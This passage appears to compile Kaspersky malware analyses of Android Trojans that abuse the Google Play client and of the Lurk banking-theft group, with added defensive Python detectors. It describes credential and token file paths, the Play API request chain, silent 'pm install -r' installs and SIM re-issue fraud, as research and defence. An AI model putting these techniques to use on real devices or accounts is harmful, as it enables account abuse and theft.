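    treat that, and empty or malformed entries, as no services.
    """
    services = []
    if not setting_value or setting_value.strip() == "null":
        return services
    for entry in setting_value.split(":"):
        entry = entry.strip()
        if "/" not in entry:
            continue
        package, cls = entry.split("/", 1)
        if cls.startswith("."):          # expand the `pkg/.Class` shorthand
            cls = package + cls
        if package and cls:
            services.append((package, cls))
    return services


def find_suspicious_services(setting_value, allowlist=KNOWN_ACCESSIBILITY_PACKAGES):
    """Return the enabled services whose package is not on the allowlist.

    A hit means a third-party package can read the screen and inject clicks,
    which is exactly what Ztorg-style modules need to drive the Play client.
    """
    return [
        (package, cls)
        for package, cls in parse_enabled_services(setting_value)
        if package not in allowlist
    ]


if __name__ == "__main__":
    for package, cls in find_suspicious_services(SAMPLE_SETTING):
        print(f"suspicious accessibility service: {package} ({cls})")
```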
Level 2. Pro
Some malware writers take roads less traveled. Instead of using the easy and reliable way described above, they create their own client for the app store using HTTPS API.
The difficult part about this approach is that the operation of the self-made client requires information (e.g. user credentials and authentication tokens) which is not available to a regular app. However, the cybercriminals are very fortunate that all the required data are stored on the device in clear text, in the convenient SQLite format. Access to the data is limited by the Android security model; however, apps may circumvent it, e.g. by rooting the device and thus gaining unlimited access.
For example, some versions of the Trojan.AndroidOS.Guerrilla.a have their own client for Google Play, which is distributed with the help of the rooter Leech. This client successfully fulfils the task of downloading and installing free and paid apps, and is capable of rating apps and leaving comments in the Google store.
After launch, Guerrilla starts to collect the following required information:
The credentials to the user’s Google Play account.
Activities in Google Play require special tokens that are generated when the user logs in. When the user is already logged in to Google Play, the Trojan can use the locally cached tokens. They can be located through a simple search through the database located at /data/system/users/0/accounts.db:
With the help of the code below, the Trojan checks if there are ready tokens on the infected device, i.e. if the user has logged on and can do activities in Google Play:
If no such tokens are available, the Trojan obtains the user’s username and hashed password, and authenticates via OAuth:
Android_id is the device’s unique ID.
Google Service Framework ID is the device’s identifier across Google services.
First, the Trojan attempts to obtain this ID using regular methods. If these fail for whatever reason, it executes the following code:
Google Advertising ID is the unique advertising ID provided by Google Play services.
Guerrilla obtains it as follows:
In a similar way, the Trojan obtains hashed data about the device from the file “/data/data/com.google.android.gms/shared_prefs/Checkin.xml“.
When the Trojan has collected the above data, it begins to receive tasks to download and install apps. Below is the structure of one such task:
The Trojan downloads the application by sending POST requests using the links below:
https://android.clients.google.com/fdfe/search: a search is undertaken for the request sent by the cybercriminals. This request is needed to simulate the user’s interaction with the Google Play client. (The main scenario of installing apps from the official client presupposes that the user first does the search request and only then visits the app’s page).
https://android.clients.google.com/fdfe/details: with this request, additional information needed to download the app is collected.
https://android.clients.google.com/fdfe/purchase: the token and purchase details are downloaded, used in the next request.
https://android.clients.google.com/fdfe/delivery: the Trojan receives the URL and the cookie-files required to download the Android application package (APK) file.
https://android.clients.google.com/fdfe/log: the download is confirmed (so the download counter is incremented.)
https://android.clients.google.com/fdfe/addReview: the app is rated and a comment is added.
When creating the requests, the cybercriminals attempted to simulate most accurately the equivalent requests sent by the official client. For example, the below set of HTTP headers is used in each request:
After the request is executed, the app may (optionally) get downloaded, installed (using the command ‘pm install -r’ which allows for installation of applications without the user’s consent) and launched.
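On the network side, the chain of fdfe requests listed above is only expected from the official Play client, so a third-party package reproducing it is a strong indicator of a Guerrilla-style self-made client. The following Python detector is an added example, not code from the Kaspersky article; it runs over constructed per-app egress log lines in the format `<epoch> <package> <method> <url>` (the format, the package names other than com.android.vending and com.google.android.gms, and the log contents are assumptions for the example).

```python
"""Detect a self-made Google Play client from egress logs (added example,
not code from the Kaspersky article).

The article lists the fdfe endpoints Guerrilla's own client walks through:
search -> details -> purchase -> delivery -> log -> addReview.  On a device,
only the official client (com.android.vending) and Google Play services
(com.google.android.gms) are expected to call them.  The detector groups
requests by originating package and reports any other package that
reproduces the chain, ranking a package that reached purchase and delivery
(i.e. obtained an APK download URL) as the most serious.
"""
import re
from collections import defaultdict

# Packages allowed to speak to the Play backend; an assumption for the example.
PLAY_CLIENTS = {"com.android.vending", "com.google.android.gms"}

# Endpoint chain from the article, in the order the official client uses it.
FDFE_CHAIN = ["search", "details", "purchase", "delivery", "log", "addReview"]

# Constructed log format: "<epoch> <package> <method> <url>", one request
# per line, as a per-app egress proxy or VPN-based monitor might record it.
LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(GET|POST)\s+(\S+)$")
FDFE_RE = re.compile(r"^https://android\.clients\.google\.com/fdfe/([A-Za-z]+)")

SAMPLE_LOG = """\
1472731200 com.android.vending POST https://android.clients.google.com/fdfe/search
1472731201 com.android.vending POST https://android.clients.google.com/fdfe/details
1472731202 com.android.vending POST https://android.clients.google.com/fdfe/purchase
1472731203 com.android.vending POST https://android.clients.google.com/fdfe/delivery
1472731300 com.cleaner.boost POST https://android.clients.google.com/fdfe/search
1472731301 com.cleaner.boost POST https://android.clients.google.com/fdfe/details
1472731302 com.cleaner.boost POST https://android.clients.google.com/fdfe/purchase
1472731303 com.cleaner.boost POST https://android.clients.google.com/fdfe/delivery
1472731304 com.cleaner.boost POST https://android.clients.google.com/fdfe/log
1472731305 com.cleaner.boost POST https://android.clients.google.com/fdfe/addReview
1472731400 com.example.news GET https://android.clients.google.com/fdfe/details
1472731401 com.example.news GET https://example.com/feed.json
"""


def parse_fdfe_requests(log_text):
    """Yield (timestamp, package, endpoint) for every fdfe request in the log."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue            # malformed line: skip rather than crash
        ts, package, _method, url = m.groups()
        f = FDFE_RE.match(url)
        if f:
            yield int(ts), package, f.group(1)


def fdfe_steps_by_package(log_text):
    """Map each package to the chain endpoints it called, in time order."""
    steps = defaultdict(list)
    for _ts, package, endpoint in sorted(parse_fdfe_requests(log_text)):
        if endpoint in FDFE_CHAIN:
            steps[package].append(endpoint)
    return steps


def detect_rogue_play_clients(log_text, min_steps=3):
    """Return findings for non-Play packages that reproduce the fdfe chain.

    severity "high":   the package reached both purchase and delivery, so it
                       could have pulled an APK (and billed the account).
    severity "medium": at least `min_steps` distinct chain endpoints, hit in
                       the official client's order.
    """
    findings = []
    for package, steps in fdfe_steps_by_package(log_text).items():
        if package in PLAY_CLIENTS:
            continue
        distinct = set(steps)
        positions = [FDFE_CHAIN.index(s) for s in steps]
        in_order = all(a <= b for a, b in zip(positions, positions[1:]))
        if {"purchase", "delivery"} <= distinct:
            severity = "high"
        elif len(distinct) >= min_steps and in_order:
            severity = "medium"
        else:
            continue
        findings.append({"package": package, "steps": steps, "severity": severity})
    return sorted(findings, key=lambda f: f["package"])


if __name__ == "__main__":
    for f in detect_rogue_play_clients(SAMPLE_LOG):
        print(f"{f['severity'].upper():6} {f['package']}: {' -> '.join(f['steps'])}")
```

A single details call from an ordinary app (com.example.news in the sample) is deliberately not reported; the signal is the chain, not any one endpoint.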
Conclusion
The Trojans that use the Google Play app to download, install and launch apps from the store to a smartphone without the device owner’s consent are typically distributed by rooters – malicious programs which have already gained the highest possible privileges on the device. It is this particular fact that allows them to launch such attacks on the Google Play client app.
This type of malicious program poses a serious threat: in Q2 2016, different rooters occupied more than half of the Top 20 of mobile malware. All the more so because rooters can download not only malicious programs that compromise the Android ecosystem and spend the user’s money on purchasing unnecessary paid apps, but other malware as well.
The Hunt for Lurk
1.9.2016 Kaspersky Virus
In early June, 2016, the Russian police arrested the alleged members of the criminal group known as Lurk. The police suspected Lurk of stealing nearly three billion rubles, using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations, including banks. For Kaspersky Lab, these arrests marked the culmination of a six-year investigation by the company’s Computer Incidents Investigation team. We are pleased that the police authorities were able to put the wealth of information we accumulated to good use: to detain suspects and, most importantly, to put an end to the theft. We ourselves gained more knowledge from this investigation than from any other. This article is an attempt to share this experience with other experts, particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks.
When we first encountered Lurk, in 2011, it was a nameless Trojan. It all started when we became aware of a number of incidents at several Russian banks that had resulted in the theft of large sums of money from customers. To steal the money, the unknown criminals used a hidden malicious program that was able to interact automatically with the financial institution’s remote banking service (RBS) software; replacing bank details in payment orders generated by an accountant at the attacked organization, or even generating such orders by itself.
In 2016, it is hard to imagine banking software that does not demand some form of additional authentication, but things were different back in 2011. In most cases, the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash. Russia’s banking system, like those of many other countries, was unprepared for such attacks, and cybercriminals were quick to exploit the security gap.
We participated in the investigation of several incidents involving the nameless malware, and sent samples to our malware analysts. They created a signature to see if any other infections involving it had been registered, and discovered something very unusual: our internal malware naming system insisted that what we were looking at was a Trojan that could be used for many things (spamming, for example) but not stealing money.
Our detection systems suggest that a program with a certain set of functions can sometimes be mistaken for something completely different. In the case of this particular program the cause was slightly different: an investigation revealed that it had been detected by a “common” signature because it was doing nothing that could lead the system to include it in any specific group, for example, that of banking Trojans.
Whatever the reason, the fact remained that the malicious program was used for the theft of money.
So we decided to take a closer look at the malware. The first attempts to understand how the program worked gave our analysts nothing. Regardless of whether it was launched on a virtual or a real machine, it behaved in the same way: it didn’t do anything. This is how the program, and later the group behind it, got its name. To “lurk” means to hide, generally with the intention of ambush.
We were soon able to help investigate another incident involving Lurk. This time we got a chance to explore the image of the attacked computer. There, in addition to the familiar malicious program, we found a .dll file with which the main executable file could interact. This was our first piece of evidence that Lurk had a modular structure.
Later discoveries suggest that, in 2011, Lurk was still at an early stage of development. It was formed of just two components, a number that would grow considerably over the coming years.
The additional file we uncovered did little to clarify the nature of Lurk. It was clear that it was a Trojan targeting RBS and that it was used in a relatively small number of incidents. In 2011, attacks on such systems were starting to grow in popularity. Other, similar, programs were already known about, the earliest detected as far back as 2006, with new malware appearing regularly since then. These included ZeuS, SpyEye, Carberp, etc. In this series, Lurk represented yet another dangerous piece of malware.
It was extremely difficult to make Lurk work in a lab environment. New versions of the program appeared only rarely, so we had few opportunities to investigate new incidents involving Lurk. A combination of these factors influenced our decision to postpone our active investigation into this program and turn our attention to more urgent tasks.
A change of leader
For about a year after we first met Lurk, we heard little about it. It later turned out that the incidents involving this malicious program were buried in the huge amount of similar incidents involving other malware. In May 2011, the source code of ZeuS had been published on the Web and this resulted in the emergence of many program modifications developed by small groups of cybercriminals.
In addition to ZeuS, there were a number of other unique financial malware programs. In Russia, there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS. Carberp was the most active among them. At the end of March 2012, the majority of its members were arrested by the police. This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity, and was considered a “leader” among cybercriminals. However, by the time of the arrests, Carberp’s reputation as a major player was already waning. There was a new challenger for the crown.
A few weeks before the arrests, the sites of a number of major Russian media, such as the agency “RIA Novosti”, Gazeta.ru and others, had been subjected to a watering hole attack. The unknown cybercriminals behind this attack distributed their malware by exploiting a vulnerability in the websites’ banner exchange system. A visitor to the site would be redirected to a fraudulent page containing a Java exploit. Successful exploitation of the vulnerability initiated the launch of a malicious program whose main function was collecting information on the attacked computer, sending it to a malicious server, and in some cases receiving and installing an extra load from the server.
The code on the main page of RIA.ru that is used to download additional content from AdFox.ru
From a technical perspective, the malicious program was unusual. Unlike most other malware, it left no traces on the hard drive of the attacked system and worked only in the RAM of the machine. This approach is not often used in malware, primarily because the resulting infection is “short-lived”: the malware exists in the system only until the computer is restarted, at which point the process of infection needs to be started anew. But, in the case of these attacks, the secret “bodiless” malicious program did not have to gain a foothold in the victim’s system. Its primary job was to explore; its secondary role was to download and install additional malware. Another fascinating detail was the fact that the malware was only downloaded in a small number of cases, when the victim computer turned out to be “interesting”.
Part of the Lurk code responsible for downloading additional modules
Analysis of the bodiless malicious program showed that it was “interested” in computers with remote banking software installed. More specifically, RBS software created by Russian developers. Much later we learned that this unnamed, bodiless module was a mini, one of the malicious programs which used Lurk. But at the time we were not sure whether the Lurk we had known since 2011, and the Lurk discovered in 2012, were created by the same people. We had two hypotheses: either Lurk was a program written for sale, and both the 2011 and 2012 versions were the result of the activity of two different groups, which had each bought the program from the author; or the 2012 version was a modification of the previously known Trojan.
The second hypothesis turned out to be correct.
Invisible war with banking software
A small digression. Remote banking systems consist of two main parts: the bank and the client. The client part is a small program that allows the user (usually an accountant) to remotely manage their organization’s accounts. There are only a few developers of such software in Russia, so any Russian organization that uses RBS relies on software developed by one of these companies. For cybercriminal groups specializing in attacks on RBS, this limited range of options plays straight into their hands.
In April 2013, a year after we found the “bodiless” Lurk module, the Russian cybercriminal underground was using several families of malicious software that specialized in attacks on banking software. Almost all operated in a similar way: during the exploration stage they found out whether the attacked computer had the necessary banking software installed. If it did, the malware downloaded additional modules, including ones allowing for the automatic creation of unauthorized payment orders, changing details in legitimate payment orders, etc. This level of automation became possible because the cybercriminals had thoroughly studied how the banking software operated and “tailored” their malicious software modules to a specific banking solution.
The people behind the creation and distribution of Lurk had done exactly the same: studying the client component of the banking software and modifying their malware accordingly. In fact, they created an illegal add-on to the legal RBS product.
Through the information exchanges used by people in the security industry, we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software. Some of them were having to release weekly patches to customers. These updates would fix the immediate security problems, but the mysterious hackers “on the other side” would quickly release a new version of malware that bypassed the upgraded protection created by the authors of the banking programs.
It should be understood that this type of work – reverse-engineering a professional banking product – cannot easily be undertaken by an amateur hacker. In addition, the task is tedious and time-consuming and not the kind to be performed with great enthusiasm. It would need a team of specialists. But who in their right mind would openly take up illegal work, and who might have the money to finance such activities? In trying to answer these questions, we eventually came to the conclusion that every version of Lurk probably had an organized group of cybersecurity specialists behind it.
The relative lull of 2011-2012 was followed by a steady increase in notifications of Lurk-based incidents resulting in the theft of money. Due to the fact that affected organizations turned to us for help, we were able to collect ever more information about the malware. By the end of 2013, the information obtained from studying hard drive images of attacked computers as well as data available from public sources, enabled us to build a rough picture of a group of Internet users who appeared to be associated with Lurk.
This was not an easy task. The people behind Lurk were pretty good at anonymizing their activity on the network. For example, they were actively using encryption in everyday communication, as well as false data for domain registration, services for anonymous registration, etc. In other words, it was not as easy as simply looking someone up on “Vkontakte” or Facebook using the name from Whois, which can happen with other, less professional groups of cybercriminals, such as Koobface. The Lurk gang did not make such blunders. Yet mistakes, seemingly insignificant and rare, still occurred. And when they did, we caught them.
Not wishing to give away free lessons in how to run a conspiracy, I will not provide examples of these mistakes, but their analysis allowed us to build a pretty clear picture of the key characteristics of the gang. We realized that we were dealing with a group of about 15 people (although by the time it was shut down, the number of “regular” members had risen to 40). This team provided the so-called “full cycle” of malware development, delivery and monetization – rather like a small, software development company. At that time the “company” had two key “products”: the malicious program, Lurk, and a huge botnet of computers infected with it. The malicious program had its own team of developers, responsible for developing new functions, searching for ways to “interact” with RBS systems, providing stable performance and fulfilling other tasks. They were supported by a team of testers who checked the program performance in different environments. The botnet also had its own team (administrators, operators, money flow manager, and other partners working with the bots via the administration panel) who ensured the operation of the command and control (C&C) servers and protected them from detection and interception.
Developing and maintaining this class of malicious software requires professionals and the leaders of the group hunted for them on job search sites. Examples of such vacancies are covered in my article about Russian financial cybercrime. The description of the vacancy did not mention the illegality of the work on offer. At the interview, the “employer” would question candidates about their moral principles: applicants were told what kind of work they would be expected to do, and why. Those who agreed got in.
A fraudster has advertised a job vacancy for java / flash specialists on a popular Ukrainian website. The job requirements include a good level of programming skills in Java, Flash, knowledge of JVM / AVM specifications, and others. The organizer offers remote work and full employment with a salary of $2,500.
So, every morning, from Monday to Friday, people in different parts of Russia and Ukraine sat down in front of their computer and started to “work”. The programmers “tuned” the functions of malware modifications, after which the testers carried out the necessary tests on the quality of the new product. Then the team responsible for the botnet and for the operation of the malware modules and components uploaded the new version onto the command server, and the malicious software on botnet computers was automatically updated. They also studied information sent from infected computers to find out whether they had access to RBS, how much money was deposited in clients’ accounts, etc.
The money flow manager, responsible for transferring the stolen money into the accounts of money mules, would press the button on the botnet control panel and send hundreds of thousands of rubles to accounts that the “drop project” managers had prepared in advance. In many cases they didn’t even need to press the button: the malicious program substituted the details of the payment order generated by the accountant, and the money went directly to the accounts of the cybercriminals and on to the bank cards of the money mules, who cashed it via ATMs, handed it over to the money mule manager who, in turn, delivered it to the head of the organization. The head would then allocate the money according to the needs of the organization: paying a “salary” to the employees and a share to associates, funding the maintenance of the expensive network infrastructure, and of course, satisfying their own needs. This cycle was repeated several times.
Each member of the typical criminal group has their own responsibilities.
These were the golden years for Lurk. The shortcomings in RBS transaction protection meant that stealing money from a victim organization through an accountant’s infected machine did not require any special skills and could even be automated. But all “good things” must come to an end.
The end of “auto money flow” and the beginning of hard times
The explosive growth of thefts committed by Lurk and other cybercriminal groups forced banks, their IT security teams and banking software developers to respond.
First of all, the developers of RBS software blocked public access to their products. Before the appearance of financial cybercriminal gangs, any user could download a demo version of the program from the manufacturer’s website. Attackers used this to study the features of banking software in order to create ever more tailored malicious programs for it. Finally, after many months of “invisible war” with cybercriminals, the majority of RBS software vendors succeeded in perfecting the security of their products.
At the same time, the banks started to implement dedicated technologies to counter the so-called “auto money flow”, the procedure which allowed the attackers to use malware to modify the payment order and steal money automatically.
By the end of 2013, we had thoroughly explored the activity of Lurk and collected considerable information about the malware. At our farm of bots, we could finally launch a consistently functioning malicious script, which allowed us to learn about all the modifications cybercriminals had introduced into the latest versions of the program. Our team of analysts had also made progress: by the year’s end we had a clear insight into how the malware worked, what it comprised and what optional modules it had in its arsenal.
Most of this information came from the analysis of incidents caused by Lurk-based attacks. We were simultaneously providing technical consultancy to the law enforcement agencies investigating the activities of this gang.
It was clear that the cybercriminals were trying to counteract the changes introduced in banking and IT security. For example, once the banking software vendors stopped providing demo versions of their programs for public access, the members of the criminal group established a shell company to receive directly any updated versions of the RBS software.
Thefts declined as a result of improvements in the security of banking software, and the “auto money flow” became less effective. As far as we can judge from the data we have, in 2014 the criminal group behind Lurk seriously reduced its activity and “lived from hand to mouth”, attacking anyone they could, including ordinary users. Even if an attack could bring in no more than a few tens of thousands of rubles, they would still stoop to it.
In our opinion, this was caused by economic factors: by that time, the criminal group had an extensive and extremely costly network infrastructure, so, in addition to employees’ salaries, it was necessary to pay for renting servers, VPN and other technical tools. Our estimates suggest that the network infrastructure alone cost the Lurk managers tens of thousands of dollars per month.
Attempts to come back
In addition to increasing the number of “minor” attacks, the cybercriminals were trying to solve their cash flow problem by “diversifying” the business and expanding their field of activity. This included developing, maintaining and renting the Angler exploit pack (also known as XXX). Initially, this was used mainly to deliver Lurk to victims’ computers. But as the number of successful attacks started to decline, the owners began to offer smaller groups paid access to the tools.
By the way, judging by what we saw on Russian underground forums for cybercriminals, the Lurk gang had an almost legendary status. Even though many small and medium-sized groups were willing to “work” with them, they always preferred to work by themselves. So when Lurk provided other cybercriminals with access to Angler, the exploit pack became especially popular – a “product” from the top underground authority did not need advertising. In addition, the exploit pack was actually very effective, delivering a very high percentage of successful vulnerability exploitations. It didn’t take long for it to become one of the key tools on the criminal2criminal market.
As for extending the field of activity, the Lurk gang decided to focus on the customers of major Russian banks and the banks themselves, whereas previously they had chosen smaller targets.
In the second half of 2014, we spotted familiar pseudonyms of Internet users on underground forums inviting specialists to cooperate on document fraud. Early the following year, several Russian cities were swamped with announcements about fraudsters who used fake letters of attorney to re-issue SIM cards without their owners being aware of it.
The purpose of this activity was to gain access to one-time passwords sent by the bank to the user so that they could confirm their financial transaction in the online or remote banking system. The attackers exploited the fact that, in remote areas, mobile operators did not always carefully check the authenticity of the documents submitted and released new SIM cards at the request of cybercriminals. Lurk would infect a computer, collect its owner’s personal data, generate a fake letter of attorney with the help of “partners” from forums and then request a new SIM card from the network operator.
Once the cybercriminals received a new SIM card, they immediately withdrew all the money from the victim’s account and disappeared.
Although initially this scheme yielded good returns, this didn’t last long, since by then many banks had already implemented protection mechanisms to track changes in the unique SIM card number. In addition, the SIM card-based campaign forced some members of the group and their partners out into the open and this helped law enforcement agencies to find and identify suspects.
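The paragraph above says the SIM re-issue scheme stopped paying off once banks began tracking changes to the SIM identifier behind a customer's phone number. The following is an added illustration of that kind of control, written for this page and not taken from the article or from Kaspersky Lab. It assumes the bank can obtain the current SIM identifier (ICCID) for a number from the operator, that a change triggers manual review and a cooling-off period during which SMS one-time passwords are not used, and that the policy values and sample records are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Assumed policy values for this example (not from the article).
COOLING_OFF = timedelta(days=3)   # no SMS OTP this long after a SIM change
LOW_RISK_LIMIT = 5_000            # amount up to which a weaker fallback is acceptable


@dataclass
class Customer:
    phone: str
    known_iccid: str                       # SIM identifier the bank last verified
    sim_changed_at: Optional[datetime] = None


@dataclass
class Decision:
    # "send_sms_otp" | "alternative_verification" | "manual_review"
    action: str
    reason: str


def evaluate_transaction(customer: Customer, reported_iccid: str,
                         amount: int, now: datetime) -> Decision:
    """Decide how a transaction confirmation should be delivered.

    The key point of the control: an OTP sent by SMS is only as trustworthy as
    the SIM that receives it, so a freshly re-issued SIM must not be allowed
    to confirm transfers on its own.
    """
    if reported_iccid != customer.known_iccid:
        # The operator reports a different SIM than the one we verified.
        # Record the change and push the transaction to a human.
        customer.known_iccid = reported_iccid
        customer.sim_changed_at = now
        return Decision("manual_review", "sim_identifier_changed")

    if customer.sim_changed_at is not None and now - customer.sim_changed_at < COOLING_OFF:
        # Same SIM as last time, but it was changed recently: keep SMS OTP
        # out of the loop until the cooling-off period has elapsed.
        if amount <= LOW_RISK_LIMIT:
            return Decision("alternative_verification", "recent_sim_change_low_value")
        return Decision("manual_review", "recent_sim_change_high_value")

    return Decision("send_sms_otp", "ok")


# Constructed sample: (ICCID reported by the operator, amount, timestamp).
_T0 = datetime(2015, 3, 1, 10, 0)
SAMPLE_EVENTS: List[Tuple[str, int, datetime]] = [
    ("8970199900000000001", 1_000,   _T0),                          # normal transfer
    ("8970199900000000099", 200_000, _T0 + timedelta(days=1)),      # new SIM appears
    ("8970199900000000099", 1_000,   _T0 + timedelta(days=1, hours=1)),
    ("8970199900000000099", 200_000, _T0 + timedelta(days=2)),
    ("8970199900000000099", 200_000, _T0 + timedelta(days=5)),      # cooling-off over
]


def run_sample() -> List[Tuple[str, str]]:
    """Run the constructed events through the control and return the decisions."""
    customer = Customer(phone="+7-900-000-00-00", known_iccid="8970199900000000001")
    results = []
    for iccid, amount, ts in SAMPLE_EVENTS:
        d = evaluate_transaction(customer, iccid, amount, ts)
        results.append((d.action, d.reason))
    return results


if __name__ == "__main__":
    for event, decision in zip(SAMPLE_EVENTS, run_sample()):
        print(event[2].isoformat(), event[1], decision)
```

The control is deliberately conservative: the first transaction after a SIM change is never confirmed by SMS at all, and even after the SIM has been seen again, high-value transfers stay on manual review until the cooling-off period expires. Whether the operator can actually be queried for the current SIM identifier, and how long the cooling-off period should be, are assumptions to be replaced by the bank's own policy.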
Alongside the attempts to “diversify” the business and find new cracks in the defenses of financial businesses, Lurk continued to regularly perform “minor thefts” using the proven method of auto money flow. However, the cybercriminals were already planning to earn their main money elsewhere.
New “specialists”
In February 2015, Kaspersky Lab’s Global Research and Analysis Team (GReAT) released its research into the Carbanak campaign targeting financial institutions. Carbanak’s key feature, which distinguished it from “classical” financial cybercriminals, was the participation of professionals in the Carbanak team, providing deep knowledge of the target bank’s IT infrastructure, its daily routine and the employees who had access to the software used to conduct financial transactions. Before any attack, Carbanak carefully studied the target, searched for weak points and then, at a certain moment in time, committed the theft in no more than a few hours. As it turned out, Carbanak was not the only group applying this method of attack. In 2015, the Lurk team hired similar experts.
How the Carbanak group operated.
We realized this when we found incidents that resembled Carbanak in style, but did not use any of its tools. This was Lurk. The Lurk malware was used as a reliable “back door” to the infrastructure of the attacked organization rather than as a tool to steal money. Although the functionality that had previously allowed for the near-automatic theft of millions no longer worked, in terms of its secrecy Lurk was still an extremely dangerous and professionally developed piece of malware.
However, despite its attempts to develop new types of attacks, Lurk’s days were numbered. Thefts continued until the spring of 2016. But, either because of an unshakable confidence in their own impunity or because of apathy, day by day the cybercriminals were paying less attention to the anonymity of their actions. They became especially careless when cashing out money: according to our incident analysis, during the last stage of their activity, the cybercriminals used just a few shell companies to deposit the stolen money. But none of that mattered any more, as both we and the police had collected enough material to arrest suspected group members, which happened early in June this year.
No one on the Internet knows you are a cybercriminal?
My personal experience of the Lurk investigation made me think that the members of this group were convinced they would never be caught. They had grounds to be that presumptuous: they were very thorough in concealing the traces of their illegal activity, and generally tried to plan the details of their actions with care. However, like all people, they made mistakes. These errors accumulated over the years and eventually made it possible to put a stop to their activity. In other words, although it is easier to hide evidence on the Internet, some traces cannot be hidden, and eventually a professional team of investigators will find a way to read and understand them.
Lurk is neither the first nor the last example to prove this. The infamous banking Trojan SpyEye was used to steal money between 2009 and 2011. Its alleged creator was arrested in 2013 and convicted in 2014.
The first attacks involving the banking Trojan Carberp began in 2010; the members of the group suspected of creating and distributing this Trojan were arrested in 2012 and convicted in 2014. The list goes on.
The history of these and other cybercriminal groups spans the time when everyone (and members of the groups in particular) believed that they were invulnerable and the police could do nothing. The results have proved them wrong.
Unfortunately, Lurk is not the last group of cybercriminals attacking companies for financial gain. We know about some other groups targeting organizations in Russia and abroad. For these reasons, we recommend that all organizations do the following:
If your organization was attacked by hackers, immediately call the police and involve experts in digital forensics. The earlier you go to the police, the more evidence the forensic experts will be able to collect, and the more information the law enforcement officers will have to catch the criminals.
Apply strict IT security policies on terminals from which financial transactions are made and for employees working with them.
Teach all employees who have access to the corporate network the rules of safe online behavior.
Compliance with these rules will not completely eliminate the risk of financial attacks but will make it harder for fraudsters and significantly increase the probability of their making a mistake while trying to overcome these difficulties. And this will help law enforcement agencies and IT security experts in their work.
P.S.: why does it take so long?
Law enforcement agencies and IT security experts are often accused of inactivity, allowing hackers to remain at large and evade punishment despite the enormous damage caused to the victims.
The story of Lurk proves the opposite. In addition, it gives some idea of the amount of work that has to be done to obtain enough evidence to arrest and prosecute suspects. Unfortunately, the rules of the “game” are not the same for all participants: the Lurk group used a professional approach to organizing a cybercriminal enterprise, but, for obvious reasons, did not find it necessary to abide by the law. As we work with law enforcement, we must respect the law. This can be a long process, primarily because of the large number of “paper” procedures and restrictions that the law imposes on the types of information we as a commercial organization can work with.
Our cooperation with law enforcement in investigating the activity of this group can be described as a multi-stage data exchange. We provided the intermediate results of our work to the police officers; they studied them to understand whether the results of our investigation matched the results of their research. Then we got back our data “enriched” with the information from the law enforcement agencies. Of course, it was not all the information they could find, but it was the part which, by law, we had the right to work with. This process was repeated many times until we finally got a complete picture of Lurk activity. However, that was not the end of the case.
A large part of our work with law enforcement agencies was devoted to “translating” the information we could get from “technical” into “legal” language. This ensured that the results of our investigation could be described in such a way that they were clear to the judge. This is a complicated and laborious process, but it is the only way to bring to justice the perpetrators of cybercrimes.